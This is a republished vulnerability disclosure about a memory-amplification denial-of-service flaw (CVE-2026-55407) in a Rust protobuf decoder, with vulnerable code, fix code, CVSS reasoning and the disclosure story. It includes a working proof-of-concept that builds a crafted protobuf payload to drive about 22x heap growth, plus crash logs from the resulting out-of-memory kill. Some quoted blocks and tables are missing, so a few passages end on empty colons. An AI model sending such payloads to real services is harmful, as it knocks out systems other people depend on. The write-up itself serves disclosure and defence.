{"slug": "22x-memory-amp-dos-in-anthropic-s-buffa-protobuf-decoder-cve-2026-55407", "title": "22x memory amp DoS in Anthropic's buffa protobuf decoder (CVE-2026-55407)", "summary": "Anthropic's Rust protobuf library buffa contains a denial-of-service vulnerability (CVE-2026-55407) that allows attackers to trigger excessive memory allocation, up to 22x the input size, via an unknown-field decoder. Endor Labs' AI SAST engine identified the flaw, which affects all messages decoded with `preserve_unknown_fields=true`. Anthropic validated the report and shipped a fix in buffa and connectrpc 0.8.0.", "body_md": "When I pointed Endor Labs' AI SAST engine at [buffa](https://github.com/anthropics/buffa), Anthropic's Rust protobuf library, it flagged a vulnerable data flow I would not have prioritized from a quick read: an unknown-field decoder that allocates heap in proportion to attacker-controlled wire data. The engine called it a potential denial of service via excessive memory allocation. The proportional allocation the engine pointed at is real but modest, roughly 2x the input. Following the same function one branch further led to a second sink that amplifies a small input into a heap blow-up of about 22x, which is enough to OOM-kill a process whose memory cap sits well above any sane input-size limit.\n\nbuffa ships from Anthropic, the same lab that builds frontier models, including the recently released and unreleased Mythos and Fable models, so it is about as close to model-assisted, heavily reviewed Rust as you will find. The flaw still shipped, and our AI SAST engine caught it by following the data flow end to end. The Anthropic team responded quickly to the disclosure and engaged in a productive, collaborative discussion of how severity depends on deployment.\n\nThis is a good example of [Endor Labs AI SAST](https://www.endorlabs.com/learn/ai-sast-benchmark-2x-more-real-vulnerabilities) earning its keep on a memory-safe language. 
The bug is an allocation-budget flaw on a forward-compatibility code path that every buffa-decoded message routes untrusted input through, and the engine found it by following data, not by pattern-matching a dangerous call.\n\n## Affected component\n\nTracked as [GHSA-f9qc-qg88-7pq5](https://github.com/anthropics/buffa/security/advisories/GHSA-f9qc-qg88-7pq5) / CVE-2026-55407, Moderate (CVSS 4.0 6.3). Any message decoded from untrusted input using code generated with `preserve_unknown_fields=true` (the default) was affected.\n\nThe vulnerable code is `decode_unknown_field` in `buffa/src/encoding.rs`.\n\n## How AI SAST identified it\n\nThe engine traced a length value parsed from wire data straight into a `Vec<u8>` allocation, with no bound between the two beyond fitting in a `usize`. It reported the flow stage by stage.\n\n**AI SAST output:**\n\n``` json\n{\n  \"ruleId\": \"AI SAST: Potential Denial of Service via excessive memory allocation due to large LengthDelimited field\",\n  \"level\": \"note\",\n  \"message\": \"decode_unknown_field allocates a Vec<u8> whose length is taken directly from a length prefix (len) parsed from the input for WireType::LengthDelimited fields. There is no upper bound on len beyond fitting into usize and the size of the provided buffer. A caller can supply an arbitrarily large buffer whose contents specify an arbitrarily large len, causing this function to attempt a very large allocation and potentially exhaust memory, resulting in a denial of service.\",\n  \"locations\": [{ \"physicalLocation\": {\n    \"artifactLocation\": { \"uri\": \"buffa/src/encoding.rs\" },\n    \"region\": { \"startLine\": 496 }\n  }}]\n}\n```\n\n**Identified data flow:**\n\nThis is the part of AI SAST I have come to rely on. The engine did not just see a `vec!` and shrug. 
It established that `len` originates in untrusted input, that the only check between source and sink bounds the buffer rather than the allocation, and that the function is reachable from the default decode APIs. That is a real source-to-sink data flow on a memory-safe target, and it is the thread I pulled to find the second vector.\n\n## The flagged sink: unbounded flat allocation\n\nThe engine pointed at the `LengthDelimited` arm of `decode_unknown_field`. Here it is verbatim, from `vendor/buffa/src/encoding.rs`, lines 490 through 499:\n\n``` rust\nWireType::LengthDelimited => {\n    let len = decode_varint(buf)?;\n    let len = usize::try_from(len).map_err(|_| DecodeError::MessageTooLarge)?;\n    if buf.remaining() < len {\n        return Err(DecodeError::UnexpectedEof);\n    }\n    let mut data = alloc::vec![0u8; len];   // attacker-sized allocation\n    buf.copy_to_slice(&mut data);\n    UnknownFieldData::LengthDelimited(data)\n}\n```\n\n`len` comes off the wire and is used directly as the allocation size. The `buf.remaining() < len` guard prevents an out-of-bounds read, but it does not cap the allocation. It only forces the attacker to actually deliver `len` bytes. The function's own docstring acknowledges this and pushes the mitigation onto callers, at lines 463 through 468:\n\nThat guidance is the load-bearing assumption I ended up disproving. It holds for this flat sink, where a caller-side input-size cap really does bound the allocation at about 2x. It does not hold one branch down.\n\n## Following the flow further: ~22x amplification in the StartGroup arm\n\nThe same function handles `StartGroup` unknown fields, and that arm reads nested fields in a loop until it sees the matching `EndGroup`. 
From lines 500 through 520:\n\n``` rust\nWireType::StartGroup => {\n    let depth = depth\n        .checked_sub(1)\n        .ok_or(DecodeError::RecursionLimitExceeded)?;   // bounds recursion DEPTH\n    let group_field_number = tag.field_number();\n    let mut nested = UnknownFields::new();\n    loop {\n        let nested_tag = Tag::decode(buf)?;\n        if nested_tag.wire_type() == WireType::EndGroup {\n            if nested_tag.field_number() != group_field_number {\n                return Err(DecodeError::InvalidEndGroup(nested_tag.field_number()));\n            }\n            break;\n        }\n        nested.push(decode_unknown_field(nested_tag, buf, depth)?);  // per-tag UnknownField alloc\n    }\n    UnknownFieldData::Group(nested)\n}\n```\n\nThe `checked_sub` bounds recursion depth, which stops a nested-group stack attack. It does nothing about field count inside a single group. Every loop iteration pushes an `UnknownField` into `nested.fields: Vec<UnknownField>`. On a 64-bit target an `UnknownField` is about 40 bytes: a 4-byte field number, 4 bytes of padding, and a 32-byte `UnknownFieldData` enum sized by its `LengthDelimited(Vec<u8>)` and `Group(UnknownFields)` variants.\n\nThe cheapest nested field an attacker can encode is a varint with value zero, which is exactly 2 wire bytes: a 1-byte tag and a 1-byte zero. So each 2 bytes of input produces a roughly 40-byte heap structure. That is a 20x amplification on the structures alone, plus about another 1.5x transient while the backing `Vec` doubles during growth. A 64 MiB payload of zero varints inside one unknown group drives the decoder to roughly 1.4 GB of heap.\n\nThe wire payload is trivial:\n\nThe receiving message type does not need to declare a group field. Protobuf forward-compatibility routes every unknown wire type through `decode_unknown_field`, so any concrete buffa-decoded message is exploitable. 
My POC uses `google.protobuf.Empty` precisely because it has zero defined fields, which makes the wire-level analysis unambiguous.\n\n## Reachable from the default APIs\n\nThe convenience methods feed this code path with no allocation budget. From `vendor/buffa/src/message.rs`, lines 183 through 190:\n\n``` rust\nfn decode_from_slice(mut data: &[u8]) -> Result<Self, DecodeError>\nwhere\n    Self: Sized,\n{\n    Self::decode(&mut data)\n}\n```\n\n`Message::decode`, `Message::decode_from_slice`, and `MessageView::decode_view` all reach the vulnerable sinks. The explicit `DecodeOptions` type does cap top-level message length, but the default is `DEFAULT_MAX_MESSAGE_SIZE = 0x7FFF_FFFF`, roughly 2 GiB, which is far too high to matter, and more importantly it caps input length only. It never sees the group-amplification blow-up, because that vector starts from a small input that expands during decode.\n\n## Validating it: from \"survives\" to OOM-kill\n\nI built a self-contained Cargo workspace with a POC server and attacker, vendoring buffa and buffa-types verbatim so the result is reproducible without any network access. The attacker constructs the group-amplification payload in `build_group_amp`. The programmatic core is just this:\n\n``` rust\nuse buffa::Message;\nuse buffa_types::Empty;\n\nlet nested_count = 33_554_431_usize;\nlet mut payload: Vec<u8> = Vec::with_capacity(2 * nested_count + 2);\npayload.push(0x0b); // StartGroup, field 1\nfor _ in 0..nested_count {\n    payload.extend_from_slice(&[0x08, 0x00]); // varint tag, value 0\n}\npayload.push(0x0c); // EndGroup, field 1\n\n// Server side: ~1.4 GB heap from a 64 MiB input. ~22x.\nlet _ = Empty::decode_from_slice(&payload);\n```\n\nUnder Docker with the server capped at 256 MiB, the 64 MiB payload OOM-kills it:\n\n```\npoc-server-crash    | [server] reading 67108864 byte payload\npoc-server-crash    | [server] payload read; input buffer = 67108864 bytes\npoc-server-crash    | [server] calling decode...\n[poc-server-crash exited with code 137]\n```\n\nExit 137 with `OOMKilled: true` confirms the kill. The measured results separate the two sinks cleanly:\n\n## Why the docstring's advice is not enough\n\nThe mitigation the function delegates to callers, \"limit the input buffer size,\" is exactly the control the amplification vector defeats. A 64 MiB input cap still permits roughly 1.4 GB of allocation. The defensive perimeter has to move from the caller into the decoder. The minimum fix is a per-group nested-field count cap, which bounds worst-case amplification at a few hundred KiB per group:\n\n``` rust\nWireType::StartGroup => {\n    let depth = depth.checked_sub(1).ok_or(DecodeError::RecursionLimitExceeded)?;\n    let group_field_number = tag.field_number();\n    let mut nested = UnknownFields::new();\n    let mut count = 0usize;\n    loop {\n        let nested_tag = Tag::decode(buf)?;\n        if nested_tag.wire_type() == WireType::EndGroup { /* ... */ break; }\n        count += 1;\n        if count > MAX_UNKNOWN_FIELDS_PER_MESSAGE {\n            return Err(DecodeError::TooManyUnknownFields);\n        }\n        nested.push(decode_unknown_field(nested_tag, buf, depth)?);\n    }\n    UnknownFieldData::Group(nested)\n}\n```\n\nThe more robust fix is to thread a global allocation budget through `DecodeOptions` and deduct from it on every heap allocation, both the `LengthDelimited` bytes and the `UnknownField` slots, so both vectors and any future amplification path are caught by one control. 
The convenience methods should then call through `DecodeOptions::default()` with a realistic budget (64 MiB matches prost's default) rather than the current 2 GiB. Once those land, the docstring should be corrected, since input-size caps are not a sufficient mitigation for the group vector.\n\n### What shipped\n\nThe fix landed in buffa and connectrpc 0.8.0. It enforces a configurable per-message unknown-field count limit that defaults to 1 million unknown fields, which caps allocation overhead at roughly 40 MiB per message. That is the count-cap approach above, applied as a general per-message control rather than only to the group arm. Users who cannot upgrade immediately have a second option: regenerate their code with `preserve_unknown_fields=false`, which removes the unknown-field retention that feeds the sink entirely.\n\n## Impact: why severity depends on the deployment\n\nThe most interesting part of this finding is that it does not have a single correct severity. The amplification ratio is a fixed property of the code, but whether that ratio translates into a momentary blip or a critical outage depends entirely on how the consuming service is built. I think it is worth laying out that spectrum explicitly, because a reader running buffa needs to score it against their own architecture rather than inherit anyone else's number.\n\nThe two sinks sit at different points on that spectrum to begin with. The flat `LengthDelimited` sink is roughly 2x and is genuinely bounded by a transport-level input-size cap, so I am comfortable with it sitting around the 6.3 (Medium) that was assigned. A caller who caps input at, say, 4 MiB has bounded the allocation at about 8 MiB, and that is the end of it. 
The group-amplification sink is the one where severity moves, because the ~22x factor breaks the assumption that an input cap bounds memory.\n\nHere is the same vulnerability across deployment profiles, from least to most severe:\n\nThe nuance I pressed during disclosure is that the two metrics driving the score, attack requirements and availability impact, are both deployment-dependent for the amplification vector, and the favorable reading is not the general case.\n\nOn attack requirements: the justification for treating exploitation as conditional was that it needs the library deployed on an externally-reachable decode path with the input-size limit raised above the default. For the amplification vector specifically, that is the exact condition the bug defeats. The attacker does not need a raised cap; they need cap × 22 > available memory, which holds under common defaults. A 4 MB gRPC limit is already enough. So for that vector I would argue the requirements stay low rather than becoming a meaningful precondition, and that network reachability is already captured once by the attack-vector metric rather than a second time as an added requirement.\n\nOn availability: scoring it as a transient single-worker crash assumes effective rate-limiting on the decode path and automatic recovery that actually recovers. The trigger here is small, unauthenticated, and perfectly repeatable, so a worker that auto-restarts can be driven straight back into another OOM. That is a crash-loop, which reads as sustained unavailability rather than graceful degradation, and the library does not itself provide the rate-limiting that would prevent it.\n\nNone of this is a disagreement that 6.3 is correct for a specific, well-supervised, rate-limited deployment. 
It is an argument that the same code reaches the High-to-Critical range for the file-ingestion and default-gRPC profiles, and that consumers should score the vector against their own concurrency limits, memory headroom, and recovery behavior. That is also the case for a CVE: a tracked identifier lets each consumer evaluate their own exposure instead of assuming the most favorable deployment.\n\n## Disclosure\n\nI reported both vectors to Anthropic through their bug bounty program, and the experience was genuinely collaborative from start to finish. The team validated the report quickly, confirmed both vectors reproduce as described, and explicitly agreed the group-amplification analysis was correct. When I pushed back on the initial rescore, they did not wave it off. They walked me through exactly which CVSS 4.0 metrics they were using and the deployment assumptions behind each one, which is precisely the kind of transparent, technical back-and-forth that makes coordinated disclosure work well. We did not land in the same place on every metric, but the disagreement was substantive and respectful on both sides, and I came away with a clear understanding of their reasoning.\n\nAnthropic scored the issue against their own deployment profile, multiple supervised replicas with automatic restart, and settled on CVSS 4.0 6.3 (Moderate) with a $600 bounty. They shipped the fix in buffa and connectrpc 0.8.0, requested a CVE, and the issue is now tracked as [GHSA-f9qc-qg88-7pq5](https://github.com/anthropics/buffa/security/advisories/GHSA-f9qc-qg88-7pq5) and CVE-2026-55407. Throughout, the team was responsive, willing to engage on the hard scoring questions, and accommodating on disclosure timing and CVE tracking. It is a good example of a vendor security team treating an external researcher as a partner, and I appreciated working with them on it.\n\n## Takeaway\n\nWhat I want to highlight is the workflow. 
AI SAST established a true data flow from untrusted wire bytes to an unbounded allocation on a path reachable from the default API, on a memory-safe Rust target where there is no overflow to grep for. That is the hard part of triage. Following that flow one branch further, into the group decoder, is where the 22x amplification lived. The engine put me on the function that mattered, and the rest was validation.\n\nThat it found this in buffa, a library from a frontier-model lab developed by their own models, is its own small comment on the value of analysis built specifically to trace untrusted data to dangerous sinks. One DoS in one library does not prove much on its own. But the path from source to sink was there to be found, and the tool built for that job is the one that found it.", "url": "https://wpnews.pro/news/22x-memory-amp-dos-in-anthropic-s-buffa-protobuf-decoder-cve-2026-55407", "canonical_source": "https://www.endorlabs.com/learn/endor-labs-ai-sast-finds-zero-day-cve-2026-55407-buffa", "published_at": "2026-06-30 22:36:11+00:00", "updated_at": "2026-06-30 22:50:07.302940+00:00", "lang": "en", "topics": ["ai-safety", "ai-tools", "ai-research"], "entities": ["Anthropic", "Endor Labs", "buffa", "CVE-2026-55407", "Mythos", "Fable"], "alternates": {"html": "https://wpnews.pro/news/22x-memory-amp-dos-in-anthropic-s-buffa-protobuf-decoder-cve-2026-55407", "markdown": "https://wpnews.pro/news/22x-memory-amp-dos-in-anthropic-s-buffa-protobuf-decoder-cve-2026-55407.md", "text": "https://wpnews.pro/news/22x-memory-amp-dos-in-anthropic-s-buffa-protobuf-decoder-cve-2026-55407.txt", "jsonld": "https://wpnews.pro/news/22x-memory-amp-dos-in-anthropic-s-buffa-protobuf-decoder-cve-2026-55407.jsonld"}}